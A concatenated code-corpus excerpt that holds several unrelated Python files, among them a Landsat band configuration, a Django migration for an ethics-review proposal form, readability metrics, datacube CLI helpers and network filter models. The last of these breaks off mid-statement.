'number': 0,
'wavelength': [430, 450]
}, {
'name': 'blue - 2',
'number': 0,
'wavelength': [450, 510]
}, {
'name': 'green - 3',
'number': 0,
'wavelength': [530, 590]
}, {
'name': 'red - 4',
'number': 0,
'wavelength': [640, 670]
}, {
'name': 'near infrared - 5',
'number': 0,
'wavelength': [850, 880]
}, {
'name': 'swir - 6',
'number': 0,
'wavelength': [1570, 1650]
}, {
'name': 'swir - 7',
'number': 0,
'wavelength': [2110, 2290]
}, {
'name': 'cirrus - 9',
'number': 0,
'wavelength': [1360, 1380]
}, {
'name': 'thermal infrared - 10',
'number': 0,
'wavelength': [10600, 11190]
}, {
'name': 'thermal infrared - 11',
'number': 0,
'wavelength': [11500, 12510]
}]
}
datasource_id = '697a0b91-b7a8-446e-842c-97cda155554d'
usgs_landsat_url = (
'https://landsat.usgs.gov/landsat/metadata_service/bulk_metadata_files/LANDSAT_8.csv'
)
aws_landsat_base = 'http://landsat-pds.s3.amazonaws.com/'
bucket_name = 'landsat-pds'
bucket = s3.Bucket(bucket_name)
| 2.125 | 2 |
proposals/migrations/0034_auto_20211213_1503.py | UiL-OTS-labs/etcl | 2 | 12761625 | # Generated by Django 2.2.24 on 2021-12-13 14:03
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import main.validators
import proposals.utils.proposal_utils
import proposals.validators
class Migration(migrations.Migration):
dependencies = [
('proposals', '0033_auto_20210521_1154'),
]
operations = [
migrations.AlterField(
model_name='proposal',
name='avg_understood',
field=models.BooleanField(default=False, validators=[proposals.validators.AVGUnderstoodValidator], verbose_name='Ik heb kennis genomen van het bovenstaande en begrijp mijn verantwoordelijkheden ten opzichte van de AVG.'),
),
migrations.AlterField(
model_name='proposal',
name='date_start',
field=models.DateField(blank=True, null=True, verbose_name='Wat is de beoogde startdatum van het onderzoek waarvoor deze aanvraag wordt ingediend?'),
),
migrations.AlterField(
model_name='proposal',
name='dmp_file',
field=models.FileField(blank=True, storage=proposals.utils.proposal_utils.OverwriteStorage(), upload_to=proposals.utils.proposal_utils.FilenameFactory('DMP'), validators=[main.validators.validate_pdf_or_doc], verbose_name='Als je een Data Management Plan hebt voor deze aanvraag, kan je kiezen om deze hier bij te voegen. Het aanleveren van een DMP vergemakkelijkt het toetsingsproces aanzienlijk.'),
),
migrations.AlterField(
model_name='proposal',
name='funding_name',
field=models.CharField(blank=True, help_text='De titel die je hier opgeeft zal in de formele toestemmingsbrief gebruikt worden.', max_length=200, verbose_name='Wat is de naam van het gefinancierde project?'),
),
migrations.AlterField(
model_name='proposal',
name='has_minor_revision',
field=models.BooleanField(default=False, verbose_name='Is er een revisie geweest na het indienen van deze aanvraag?'),
),
migrations.AlterField(
model_name='proposal',
name='inform_local_staff',
field=models.BooleanField(blank=True, default=None, null=True, verbose_name='<p>Je hebt aangegeven dat je gebruik wilt gaan maken van één van de faciliteiten van het UiL OTS, namelijk de database, Zep software en/of het UiL OTS lab. Het lab supportteam van het UiL OTS zou graag op de hoogte willen worden gesteld van aankomende onderzoeken. Daarom vragen wij hier jouw toestemming om delen van deze aanvraag door te sturen naar het lab supportteam.</p> <p>Vind je het goed dat de volgende delen uit de aanvraag worden doorgestuurd:</p> - Jouw naam en de namen van de andere betrokkenen <br/> - De eindverantwoordelijke van het onderzoek <br/> - De titel van het onderzoek <br/> - De beoogde startdatum <br/> - Van welke faciliteiten je gebruik wil maken (database, lab, Zep software)'),
),
migrations.AlterField(
model_name='proposal',
name='institution',
field=models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, to='proposals.Institution', verbose_name='Aan welk onderzoeksinstituut ben je verbonden?'),
),
migrations.AlterField(
model_name='proposal',
name='is_pre_approved',
field=models.BooleanField(blank=True, default=None, null=True, verbose_name='Heb je formele toestemming van een ethische toetsingcommissie, uitgezonderd deze FETC-GW commissie?'),
),
migrations.AlterField(
model_name='proposal',
name='is_revision',
field=models.BooleanField(default=False, verbose_name='Is deze aanvraag een revisie van of amendement op een ingediende aanvraag?'),
),
migrations.AlterField(
model_name='proposal',
name='other_applicants',
field=models.BooleanField(default=False, verbose_name='Zijn er nog andere onderzoekers bij deze aanvraag betrokken die geaffilieerd zijn aan één van de onderzoeksinstituten ICON, OFR, OGK of UiL OTS?'),
),
migrations.AlterField(
model_name='proposal',
name='other_stakeholders',
field=models.BooleanField(default=False, verbose_name='Zijn er nog andere onderzoekers bij deze aanvraag betrokken die <strong>niet</strong> geaffilieerd zijn aan een van de onderzoeksinstituten van de Faculteit Geestwetenschappen van de UU? '),
),
migrations.AlterField(
model_name='proposal',
name='parent',
field=models.ForeignKey(help_text='Dit veld toont enkel aanvragen waar je zelf een medeuitvoerende bent.', null=True, on_delete=django.db.models.deletion.CASCADE, related_name='children', to='proposals.Proposal', verbose_name='Te kopiëren aanvraag'),
),
migrations.AlterField(
model_name='proposal',
name='pre_approval_institute',
field=models.CharField(blank=True, max_length=200, null=True, verbose_name='Welk instituut heeft de aanvraag goedgekeurd?'),
),
migrations.AlterField(
model_name='proposal',
name='pre_approval_pdf',
field=models.FileField(blank=True, upload_to=proposals.utils.proposal_utils.FilenameFactory('Pre_Approval'), validators=[main.validators.validate_pdf_or_doc], verbose_name='Upload hier je formele toestemmingsbrief van dit instituut (in .pdf of .doc(x)-formaat)'),
),
migrations.AlterField(
model_name='proposal',
name='pre_assessment_pdf',
field=models.FileField(blank=True, upload_to=proposals.utils.proposal_utils.FilenameFactory('Preassessment'), validators=[main.validators.validate_pdf_or_doc], verbose_name='Upload hier je aanvraag (in .pdf of .doc(x)-formaat)'),
),
migrations.AlterField(
model_name='proposal',
name='relation',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='proposals.Relation', verbose_name='In welke hoedanigheid ben je betrokken bij dit onderzoek?'),
),
migrations.AlterField(
model_name='proposal',
name='reviewing_committee',
field=models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, to='auth.Group', verbose_name='Door welke comissie dient deze aanvraag te worden beoordeeld?'),
),
migrations.AlterField(
model_name='proposal',
name='status',
field=models.PositiveIntegerField(choices=[(1, 'Concept'), (40, 'Opgestuurd ter beoordeling door eindverantwoordelijke'), (50, 'Opgestuurd ter beoordeling door FETC-GW'), (55, 'Aanvraag is beoordeeld door FETC-GW'), (60, 'Aanvraag is beoordeeld door FETC-GW')], default=1),
),
migrations.AlterField(
model_name='proposal',
name='supervisor',
field=models.ForeignKey(blank=True, help_text='Aan het einde van de procedure kan je deze aanvraag ter\n verificatie naar je eindverantwoordelijke sturen. De\n eindverantwoordelijke zal de aanvraag vervolgens kunnen aanpassen en\n indienen bij de FETC-GW. <br><br><strong>Tip</strong>: Type een\n aantal letters van de voornaam, achternaam, of Solis ID van het\n persoon die je toe wilt voegen in de zoekbalk hiernaast.\n Merk op dat het laden even kan duren.', null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL, verbose_name='Eindverantwoordelijke onderzoeker'),
),
migrations.AlterField(
model_name='proposal',
name='title',
field=models.CharField(help_text='De titel die je hier opgeeft is zichtbaar voor de FETC-GW-leden en, wanneer de aanvraag is goedgekeurd, ook voor alle medewerkers die in het archief van deze portal kijken. De titel mag niet identiek zijn aan een vorige titel van een aanvraag die je hebt ingediend.', max_length=200, verbose_name='Wat is de titel van je aanvraag? Deze titel zal worden gebruikt in alle formele correspondentie.'),
),
migrations.AlterField(
model_name='wmo',
name='metc_application',
field=models.BooleanField(default=False, verbose_name='Je onderzoek moet beoordeeld worden door een METC, maar dient nog wel bij de FETC-GW te worden geregistreerd. Is dit onderzoek al aangemeld bij een METC?'),
),
]
| 1.640625 | 2 |
ttt_package/libs/plot_results.py | Ipgnosis/tic_tac_toe | 0 | 12761626 | <filename>ttt_package/libs/plot_results.py
# plot the results of a multi-game run
# written by Russell on 5/4/20
# modified on 6/28 to integrate agent modes into legend
import matplotlib.pyplot as plt
# simple matplotlib graph of the results
def results_plot(plot_title, x_mode, o_mode, results):
agentX_x_axis = results[0]
agentX_y_axis = results[1]
agentO_x_axis = results[2]
agentO_y_axis = results[3]
draw_x_axis = results[4]
draw_y_axis = results[5]
x_label = "Cross wins; mode: {}".format(x_mode)
o_label = "Nought wins; mode: {}".format(o_mode)
plt.subplot(1, 1, 1)
plt.plot(agentX_x_axis, agentX_y_axis, label=x_label)
plt.plot(agentO_x_axis, agentO_y_axis, label=o_label)
plt.plot(draw_x_axis, draw_y_axis, label='Drawn games')
plt.title(plot_title)
plt.xlabel("Games")
plt.ylabel("Score")
plt.legend()
plt.show()
| 2.8125 | 3 |
icekit/utils/readability/readability.py | ic-labs/django-icekit | 52 | 12761627 | <filename>icekit/utils/readability/readability.py
#!/usr/bin/env python
import math
from .readability_utils import get_char_count
from .readability_utils import get_words
from .readability_utils import get_sentences
from .readability_utils import count_syllables
from .readability_utils import count_complex_words
class Readability:
analyzedVars = {}
def __init__(self, text):
self.analyze_text(text)
def analyze_text(self, text):
words = get_words(text)
char_count = get_char_count(words)
word_count = len(words)
sentence_count = len(get_sentences(text))
syllable_count = count_syllables(words)
complexwords_count = count_complex_words(text)
avg_words_p_sentence = word_count/sentence_count
self.analyzedVars = {
'words': words,
'char_cnt': float(char_count),
'word_cnt': float(word_count),
'sentence_cnt': float(sentence_count),
'syllable_cnt': float(syllable_count),
'complex_word_cnt': float(complexwords_count),
'avg_words_p_sentence': float(avg_words_p_sentence)
}
def ARI(self):
score = 0.0
if self.analyzedVars['word_cnt'] > 0.0:
score = 4.71 * (self.analyzedVars['char_cnt'] / self.analyzedVars['word_cnt']) + 0.5 * (self.analyzedVars['word_cnt'] / self.analyzedVars['sentence_cnt']) - 21.43
return score
def FleschReadingEase(self):
score = 0.0
if self.analyzedVars['word_cnt'] > 0.0:
score = 206.835 - (1.015 * (self.analyzedVars['avg_words_p_sentence'])) - (84.6 * (self.analyzedVars['syllable_cnt']/ self.analyzedVars['word_cnt']))
return round(score, 4)
def FleschKincaidGradeLevel(self):
score = 0.0
if self.analyzedVars['word_cnt'] > 0.0:
score = 0.39 * (self.analyzedVars['avg_words_p_sentence']) + 11.8 * (self.analyzedVars['syllable_cnt']/ self.analyzedVars['word_cnt']) - 15.59
return round(score, 4)
def GunningFogIndex(self):
score = 0.0
if self.analyzedVars['word_cnt'] > 0.0:
score = 0.4 * ((self.analyzedVars['avg_words_p_sentence']) + (100 * (self.analyzedVars['complex_word_cnt']/self.analyzedVars['word_cnt'])))
return round(score, 4)
def SMOGIndex(self):
score = 0.0
if self.analyzedVars['word_cnt'] > 0.0:
score = (math.sqrt(self.analyzedVars['complex_word_cnt']*(30/self.analyzedVars['sentence_cnt'])) + 3)
return score
def ColemanLiauIndex(self):
score = 0.0
if self.analyzedVars['word_cnt'] > 0.0:
score = (5.89*(self.analyzedVars['char_cnt']/self.analyzedVars['word_cnt']))-(30*(self.analyzedVars['sentence_cnt']/self.analyzedVars['word_cnt']))-15.8
return round(score, 4)
def LIX(self):
longwords = 0.0
score = 0.0
if self.analyzedVars['word_cnt'] > 0.0:
for word in self.analyzedVars['words']:
if len(word) >= 7:
longwords += 1.0
score = self.analyzedVars['word_cnt'] / self.analyzedVars['sentence_cnt'] + float(100 * longwords) / self.analyzedVars['word_cnt']
return score
def RIX(self):
longwords = 0.0
score = 0.0
if self.analyzedVars['word_cnt'] > 0.0:
for word in self.analyzedVars['words']:
if len(word) >= 7:
longwords += 1.0
score = longwords / self.analyzedVars['sentence_cnt']
return score
# commenting for quick py3 compatibility
# if __name__ == "__main__":
# text = """We are close to wrapping up our 10 week Rails Course. This week we will cover a handful of topics commonly encountered in Rails projects. We then wrap up with part 2 of our Reddit on Rails exercise! By now you should be hard at work on your personal projects. The students in the course just presented in front of the class with some live demos and a brief intro to to the problems their app were solving. Maybe set aside some time this week to show someone your progress, block off 5 minutes and describe what goal you are working towards, the current state of the project (is it almost done, just getting started, needs UI, etc.), and then show them a quick demo of the app. Explain what type of feedback you are looking for (conceptual, design, usability, etc.) and see what they have to say. As we are wrapping up the course you need to be focused on learning as much as you can, but also making sure you have the tools to succeed after the class is over."""
#
# rd = Readability(text)
# print 'Test text:'
# print '"%s"\n' % text
# print 'ARI: ', rd.ARI()
# # print 'FleschReadingEase: ', rd.FleschReadingEase()
# # print 'FleschKincaidGradeLevel: ', rd.FleschKincaidGradeLevel()
# print 'GunningFogIndex: ', rd.GunningFogIndex()
# print 'SMOGIndex: ', rd.SMOGIndex()
# # print 'ColemanLiauIndex: ', rd.ColemanLiauIndex()
# # print 'LIX: ', rd.LIX()
# # print 'RIX: ', rd.RIX()
#
| 2.96875 | 3 |
task/admin.py | suvajitsarkar/taskManagement | 0 | 12761628 | from django.contrib import admin
# Register your models here.
from .models import Tasks, Audit
admin.site.register(Tasks)
admin.site.register(Audit)
| 1.257813 | 1 |
agdc-v2/datacube/ui/click.py | ceos-seo/Data_Cube_v2 | 27 | 12761629 | # coding=utf-8
"""
Common functions for click-based cli scripts.
"""
from __future__ import absolute_import
import functools
import logging
import os
import re
import copy
import click
from datacube import config, __version__
from datacube.executor import get_executor
from datacube.index import index_connect
from pathlib import Path
from sqlalchemy.exc import OperationalError, ProgrammingError
_LOG_FORMAT_STRING = '%(asctime)s %(levelname)s %(message)s'
CLICK_SETTINGS = dict(help_option_names=['-h', '--help'])
def _print_version(ctx, param, value):
if not value or ctx.resilient_parsing:
return
click.echo(
'{prog}, version {version}'.format(
prog='Data Cube',
version=__version__
)
)
ctx.exit()
def compose(*functions):
"""
>>> compose(
... lambda x: x+1,
... lambda y: y+2
... )(1)
4
"""
def compose2(f, g):
return lambda x: f(g(x))
return functools.reduce(compose2, functions, lambda x: x)
class ColorFormatter(logging.Formatter):
colors = {
'info': dict(fg='white'),
'error': dict(fg='red'),
'exception': dict(fg='red'),
'critical': dict(fg='red'),
'debug': dict(fg='blue'),
'warning': dict(fg='yellow')
}
def format(self, record):
if not record.exc_info:
record = copy.copy(record)
record.levelname = click.style(record.levelname, **self.colors.get(record.levelname.lower(), {}))
return logging.Formatter.format(self, record)
class ClickHandler(logging.Handler):
def emit(self, record):
try:
msg = self.format(record)
click.echo(msg, err=True)
except (KeyboardInterrupt, SystemExit):
raise
except: # pylint: disable=bare-except
self.handleError(record)
def _init_logging(ctx, param, value):
handler = ClickHandler()
handler.formatter = ColorFormatter(_LOG_FORMAT_STRING)
logging.root.addHandler(handler)
logging_level = logging.WARN - 10 * value
logging.root.setLevel(logging_level)
logging.getLogger('datacube').setLevel(logging_level)
if not ctx.obj:
ctx.obj = {}
ctx.obj['verbosity'] = value
def _add_logfile(ctx, param, value):
formatter = logging.Formatter(_LOG_FORMAT_STRING)
for logfile in value:
handler = logging.FileHandler(logfile)
handler.formatter = formatter
logging.root.addHandler(handler)
def _log_queries(ctx, param, value):
if value:
logging.getLogger('sqlalchemy.engine').setLevel('INFO')
def _set_config(ctx, param, value):
if value:
if not any(os.path.exists(p) for p in value):
raise ValueError('No specified config paths exist: {}' % value)
paths = value
else:
paths = config.DEFAULT_CONF_PATHS
parsed_config = config.LocalConfig.find(paths=paths)
if not ctx.obj:
ctx.obj = {}
ctx.obj['config_file'] = parsed_config
#: pylint: disable=invalid-name
version_option = click.option('--version', is_flag=True, callback=_print_version,
expose_value=False, is_eager=True)
#: pylint: disable=invalid-name
verbose_option = click.option('--verbose', '-v', count=True, callback=_init_logging,
is_eager=True, expose_value=False, help="Use multiple times for more verbosity")
#: pylint: disable=invalid-name
logfile_option = click.option('--log-file', multiple=True, callback=_add_logfile,
is_eager=True, expose_value=False, help="Specify log file")
#: pylint: disable=invalid-name
config_option = click.option('--config_file', '-C', multiple=True, default='', callback=_set_config,
expose_value=False)
#: pylint: disable=invalid-name
log_queries_option = click.option('--log-queries', is_flag=True, callback=_log_queries,
expose_value=False, help="Print database queries.")
# This is a function, so it's valid to be lowercase.
#: pylint: disable=invalid-name
global_cli_options = compose(
version_option,
verbose_option,
logfile_option,
config_option,
log_queries_option
)
@click.group(help="Data Cube command-line interface", context_settings=CLICK_SETTINGS)
@global_cli_options
def cli():
pass
def pass_config(f):
"""Get a datacube config as the first argument. """
def new_func(*args, **kwargs):
config_ = click.get_current_context().obj['config_file']
return f(config_, *args, **kwargs)
return functools.update_wrapper(new_func, f)
def pass_index(app_name=None, expect_initialised=True):
"""Get a connection to the index as the first argument.
A short name name of the application can be specified for logging purposes.
"""
def decorate(f):
def with_index(*args, **kwargs):
ctx = click.get_current_context()
try:
index = index_connect(ctx.obj['config_file'],
application_name=app_name or ctx.command_path,
validate_connection=expect_initialised)
return f(index, *args, **kwargs)
except (OperationalError, ProgrammingError) as e:
handle_exception('Error Connecting to database: %s', e)
return functools.update_wrapper(with_index, f)
return decorate
def parse_endpoint(value):
ip, port = tuple(value.split(':'))
return ip, int(port)
EXECUTOR_TYPES = {
'serial': lambda _: get_executor(None, None),
'multiproc': lambda workers: get_executor(None, int(workers)),
'distributed': lambda addr: get_executor(parse_endpoint(addr), True)
}
def _setup_executor(ctx, param, value):
try:
return EXECUTOR_TYPES[value[0]](value[1])
except ValueError:
ctx.fail("Failed to create '%s' executor with '%s'" % value)
executor_cli_options = click.option('--executor',
type=(click.Choice(EXECUTOR_TYPES.keys()), str),
default=('serial', None),
help="Run parallelized, either locally or distrbuted. eg:\n"
"--executor multiproc 4 (OR)\n"
"--executor distributed 10.0.0.8:8888",
callback=_setup_executor)
def handle_exception(msg, e):
"""
Exit following an exception in a CLI app
If verbosity (-v flag) specified, dump out a stack trace. Otherwise,
simply print the given error message.
Include a '%s' in the message to print the single line message from the
exception.
:param e: caught Exception
:param msg: Message to User with optional %s
"""
ctx = click.get_current_context()
if ctx.obj['verbosity'] >= 1:
raise e
else:
if '%s' in msg:
click.echo(msg % e)
else:
click.echo(msg)
ctx.exit(1)
def to_pathlib(ctx, param, value):
if value:
return Path(value)
else:
return None
| 2.078125 | 2 |
siptracklib/win32utils.py | sii/siptrack | 8 | 12761630 | <filename>siptracklib/win32utils.py
import os
try:
import ctypes
has_ctypes = True
except ImportError:
has_ctypes = False
MAX_PATH = 260
CSIDL_APPDATA = 0x001A
CSIDL_LOCAL_APPDATA = 0x001c
CSIDL_PERSONAL = 0x0005
def get_appdata_dir():
dir = None
if has_ctypes:
SHGetSpecialFolderPath = ctypes.windll.shell32.SHGetSpecialFolderPathW
buf = ctypes.create_unicode_buffer(MAX_PATH)
SHGetSpecialFolderPath(None, buf, CSIDL_APPDATA, 0)
dir = buf.value
return dir
def get_program_files_dir():
return os.environ['ProgramFiles']
| 2.078125 | 2 |
legacy/legacy_scripts/legacy/download_CDS.py | tomkimpson/ML4L | 1 | 12761631 | <gh_stars>1-10
import climetlab as cml
import xarray as xr
from config import *
#Load the data
if load_x_data_from_remote:
xdata = cml.load_source("cds",
"reanalysis-era5-land-monthly-means",
variable=list(xvariables.values()),
product_type= "monthly_averaged_reanalysis",
year = years,
month = months,
time = times
)
print ('DATA loaded from cache')
print (xdata)
print('--------')
print ('Now trying to load into cube')
# print(xdata.to_xarray(xarray_open_mfdataset_kwargs = {'filter_by_keys':{'typeOfLevel': 'newsurface'}},backend_kwargs={'errors': 'ignore', 'filter_by_keys': {'typeOfLevel': 'notsurface'}}))
print(xdata.to_xarray(backend_kwargs={'errors': 'ignore', 'filter_by_keys': {'typeOfLevel': 'notsurface'}}))
# data = xdata.to_xarray(engine='cfgrib', backend_kwargs={'filter_by_keys':{'typeOfLevel':'surface', 'edition': 1}})
print('--------')
cds_xarray = xdata.to_xarray(backend_kwargs={'errors': 'ignore','filter_by_keys':{'edition': 1, 'typeOfLevel':'surface'}})
cds_xarray.to_netcdf(data_root+xdata)
else:
cds_xarray = xr.open_dataset(data_root+xdata)
| 1.945313 | 2 |
.history/qfunction/base/trigonometry_20210710213753.py | gpftc/qfunction | 0 | 12761632 | <filename>.history/qfunction/base/trigonometry_20210710213753.py<gh_stars>0
from qfunction.base.base import *
from numpy import sin, cos
import numpy as np
from math import atan
def q_sin(u,q,cpx=False,israd=True):
u = radian(u) if( not israd) else u
b = 1j
u=u*1j
if cpx:
return ((q_exp(u,q)-q_exp(-u,q)))/(2*b)
else:
return (((q_exp(u,q)-q_exp(-u,q)))/(2*b)).real
def q_cos(u,q=1,cpx=False,israd=True):
u = radian(u) if not israd else u
u=u*1j;
A =lambda w: 1/(1-w)
if (q> 1.9 and u>= limit(A,q)):
return np.nan
else:
if cpx:
return ((q_exp(u,q)+q_exp(-u,q)))/2
else:
return (((q_exp(u,q)+q_exp(-u,q)))/2).real
| 2.3125 | 2 |
Python Basics/2. If - Else/01. Excellent Result.py | a-shiro/SoftUni-Courses | 0 | 12761633 | <gh_stars>0
grade = float(input())
if grade>=5.50:
print("Excellent!") | 3.203125 | 3 |
fmridenoise/interfaces/__init__.py | wiheto/fmridenoise | 0 | 12761634 | <gh_stars>0
from .quality_measures import (QualityMeasures,
PipelinesQualityMeasures,
MergeGroupQualityMeasures) | 1.054688 | 1 |
networkapi/filter/models.py | vinicius-marinho/GloboNetworkAPI | 73 | 12761635 | <filename>networkapi/filter/models.py
# -*- coding: utf-8 -*-
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
from django.core.exceptions import ObjectDoesNotExist
from django.db import models
from django.db.models import Count
from networkapi.exception import InvalidValueError
from networkapi.infrastructure.ipaddr import IPNetwork
from networkapi.models.BaseModel import BaseModel
from networkapi.util import clone
from networkapi.util import is_valid_string_maxsize
from networkapi.util import is_valid_string_minsize
from networkapi.util import is_valid_text
class FilterError(Exception):
"""An error occurred during Filter table access."""
def __init__(self, cause, message=None):
self.cause = cause
self.message = message
def __str__(self):
msg = u'Causa: %s, Mensagem: %s' % (self.cause, self.message)
return msg.encode('utf-8', 'replace')
class FilterNotFoundError(FilterError):
"""Returns exception for Filter search by pk."""
def __init__(self, cause, message=None):
FilterError.__init__(self, cause, message)
class FilterDuplicateError(FilterError):
"""Returns exception for Filter name already existing."""
def __init__(self, cause, message=None):
FilterError.__init__(self, cause, message)
class CannotDissociateFilterError(FilterError):
"""Returns exception for Filter in use in environment, cannot be dissociated."""
def __init__(self, cause, message=None):
FilterError.__init__(self, cause, message)
class Filter(BaseModel):
id = models.AutoField(primary_key=True, db_column='id_filter')
name = models.CharField(
max_length=100, blank=False, unique=True, db_column='name')
description = models.CharField(
max_length=200, null=True, blank=True, db_column='description')
log = logging.getLogger('Filter')
class Meta(BaseModel.Meta):
db_table = u'filter'
managed = True
@classmethod
def get_by_pk(cls, id_):
""""Get Filter by id.
@return: Filter.
@raise FilterNotFoundError: Filter is not registered.
@raise FilterError: Failed to search for the Filter.
"""
try:
return Filter.objects.get(pk=id_)
except ObjectDoesNotExist, e:
raise FilterNotFoundError(
e, u'There is no Filter with pk = %s.' % id_)
except Exception, e:
cls.log.error(u'Failure to search the filter.')
raise FilterError(e, u'Failure to search the filter.')
def delete(self):
"""Override Django's method to remove filter
Before removing the filter removes all relationships with equipment type.
"""
# Remove all Filter and TipoEquipamento relations
for filter_equiptype in self.filterequiptype_set.all():
filter_equiptype.delete()
super(Filter, self).delete()
def validate_filter(self, filter_map):
"""Validates filter fields before add
@param filter_map: Map with the data of the request.
@raise InvalidValueError: Represents an error occurred validating a value.
"""
# Get XML data
name = filter_map['name']
description = filter_map['description']
# name can NOT be greater than 100
if not is_valid_string_minsize(name, 3) or not is_valid_string_maxsize(name, 100) or not is_valid_text(name):
self.log.error(u'Parameter name is invalid. Value: %s.', name)
raise InvalidValueError(None, 'name', name)
# description can NOT be greater than 200
if not is_valid_string_minsize(description, 3, False) or not is_valid_string_maxsize(description, 200, False) or not is_valid_text(description, True):
self.log.error(
u'Parameter description is invalid. Value: %s.', description)
raise InvalidValueError(None, 'description', description)
# Verify existence
if len(Filter.objects.filter(name=name).exclude(id=self.id)) > 0:
raise FilterDuplicateError(
None, u'Já existe um filtro com o nome %s no banco de dados.' % name)
# set variables
self.name = name
self.description = description
def check_filter_use(new_filter_id, env):
from networkapi.equipamento.models import EquipamentoAmbiente
from networkapi.ip.models import NetworkIPv4, NetworkIPv6
from networkapi.vlan.models import Vlan
try:
# Check existence of new filter
new_fil = Filter.objects.get(pk=new_filter_id)
except ObjectDoesNotExist:
new_fil = None
pass
# Filters
old_fil = env.filter
if old_fil is not None:
# Envs using old filter
envs_old_filter = old_fil.ambiente_set.all()
# Vlans in listed envs
vlans = list()
for env_old_filter in envs_old_filter:
for vlan in env_old_filter.vlan_set.all():
vlans.append(vlan)
# Nets in vlan
nets_ipv4 = list()
nets_ipv6 = list()
for vlan in vlans:
for net in vlan.networkipv4_set.all():
nets_ipv4.append({'net': net, 'vlan_env': vlan.ambiente})
for net in vlan.networkipv6_set.all():
nets_ipv6.append({'net': net, 'vlan_env': vlan.ambiente})
# Verify subnet ipv4
for i in range(0, len(nets_ipv4)):
net = nets_ipv4[i].get('net')
ip = '%s.%s.%s.%s/%s' % (net.oct1,
net.oct2, net.oct3, net.oct4, net.block)
network_ip_verify = IPNetwork(ip)
nets_ipv4_aux = clone(nets_ipv4)
nets_ipv4_aux.remove(nets_ipv4[i])
if verify_subnet_and_equip(nets_ipv4_aux, network_ip_verify, 'v4',
net, nets_ipv4[i].get('vlan_env')):
env_aux_id = nets_ipv4[i].get('vlan_env').id
if env.id == env_aux_id:
raise CannotDissociateFilterError(
old_fil.name, u'Filter %s cannot be dissociated, its in use.' % old_fil.name)
# Verify subnet ipv6
for i in range(0, len(nets_ipv6)):
net = nets_ipv6[i].get('net')
ip = '%s:%s:%s:%s:%s:%s:%s:%s/%d' % (net.block1, net.block2, net.block3,
net.block4, net.block5, net.block6,
net.block7, net.block8, net.block)
network_ip_verify = IPNetwork(ip)
nets_ipv6_aux = clone(nets_ipv6)
nets_ipv6_aux.remove(nets_ipv6[i])
if verify_subnet_and_equip(nets_ipv6_aux, network_ip_verify, 'v6',
net, nets_ipv6[i].get('vlan_env')):
env_aux_id = nets_ipv6[i].get('vlan_env').id
if env.id == env_aux_id:
raise CannotDissociateFilterError(
old_fil.name, u'Filter %s cannot be dissociated, its in use.' % old_fil.name)
old_tp_equips = [
fet.equiptype.id for fet in old_fil.filterequiptype_set.all()]
if new_fil is not None:
new_tp_equips = [
fet.equiptype.id for fet in new_fil.filterequiptype_set.all()]
else:
new_tp_equips = []
# EquipTypes being excluded, check for these in environments
diff_tp_equips = list(set(old_tp_equips) - set(new_tp_equips))
# Check equipments with type in diff, associated to this environment
if len(diff_tp_equips) > 0:
# Filter case 1 and 2
# Check for networks with same ip range
nets_same_range = NetworkIPv4.objects.values(
'oct1', 'oct2', 'oct3', 'oct4', 'block'
).annotate(count=Count('id')).filter(count__gt=1)
if len(nets_same_range) > 0:
for net_gp in nets_same_range:
nets_current_range = NetworkIPv4.objects.filter(
oct1=net_gp['oct1'],
oct2=net_gp['oct2'],
oct3=net_gp['oct3'],
oct4=net_gp['oct4'],
block=net_gp['block']
)
envs_of_nets = [
net_crt.vlan.ambiente.id for net_crt in nets_current_range]
if env.id in envs_of_nets:
eqas = EquipamentoAmbiente.objects.filter(
equipamento__tipo_equipamento__in=diff_tp_equips, ambiente=env.id)
equips_in_env = [eqa.equipamento.id for eqa in eqas]
# Get other environments with these equips
other_envs = [eqa.ambiente.id for eqa in EquipamentoAmbiente.objects.filter(
equipamento__in=equips_in_env,
ambiente__in=envs_of_nets
).exclude(ambiente=env.id)]
if len(other_envs) > 0:
raise CannotDissociateFilterError(
old_fil.name, u'Filter %s cannot be dissociated, its in use.' % old_fil.name)
# Check for networks v6 with same ip range
nets_same_range_v6 = NetworkIPv6.objects.values(
'block1', 'block2', 'block3', 'block4',
'block5', 'block6', 'block7', 'block8', 'block'
).annotate(count=Count('id')).filter(count__gt=1)
if len(nets_same_range_v6) > 0:
for net_gp in nets_same_range_v6:
nets_current_range = NetworkIPv6.objects.filter(
block1=net_gp['block1'],
block2=net_gp['block2'],
block3=net_gp['block3'],
block4=net_gp['block4'],
block5=net_gp['block5'],
block6=net_gp['block6'],
block7=net_gp['block7'],
block8=net_gp['block8'],
block=net_gp['block']
)
envs_of_nets = [
net_crt.vlan.ambiente.id for net_crt in nets_current_range]
if env.id in envs_of_nets:
eqas = EquipamentoAmbiente.objects.filter(
equipamento__tipo_equipamento__in=diff_tp_equips, ambiente=env.id)
equips_in_env = [eqa.equipamento.id for eqa in eqas]
# Get other environments with these equips
other_envs = [eqa.ambiente.id for eqa in EquipamentoAmbiente.objects.filter(
equipamento__in=equips_in_env,
ambiente__in=envs_of_nets
).exclude(ambiente=env.id)]
if len(other_envs) > 0:
raise CannotDissociateFilterError(
old_fil.name, u'Filter %s cannot be dissociated, its in use.' % old_fil.name)
# End of filter case 1 and 2
# Filter case 3
# Get vlans with same number
vlans_same_number = Vlan.objects.values('num_vlan').annotate(
count=Count('id')).filter(count__gt=1)
if len(vlans_same_number) > 0:
for vlan_gp in vlans_same_number:
vlans_current_number = Vlan.objects.filter(
num_vlan=vlan_gp['num_vlan'])
envs_of_vlans = [
vlan.ambiente.id for vlan in vlans_current_number]
if env.id in envs_of_vlans:
eqas = EquipamentoAmbiente.objects.filter(
ambiente=env.id)
equips_in_env = [eqa.equipamento.id for eqa in eqas]
# Get other environments with these equips
other_envs = [eqa.ambiente.id for eqa in EquipamentoAmbiente.objects.filter(
equipamento__in=equips_in_env,
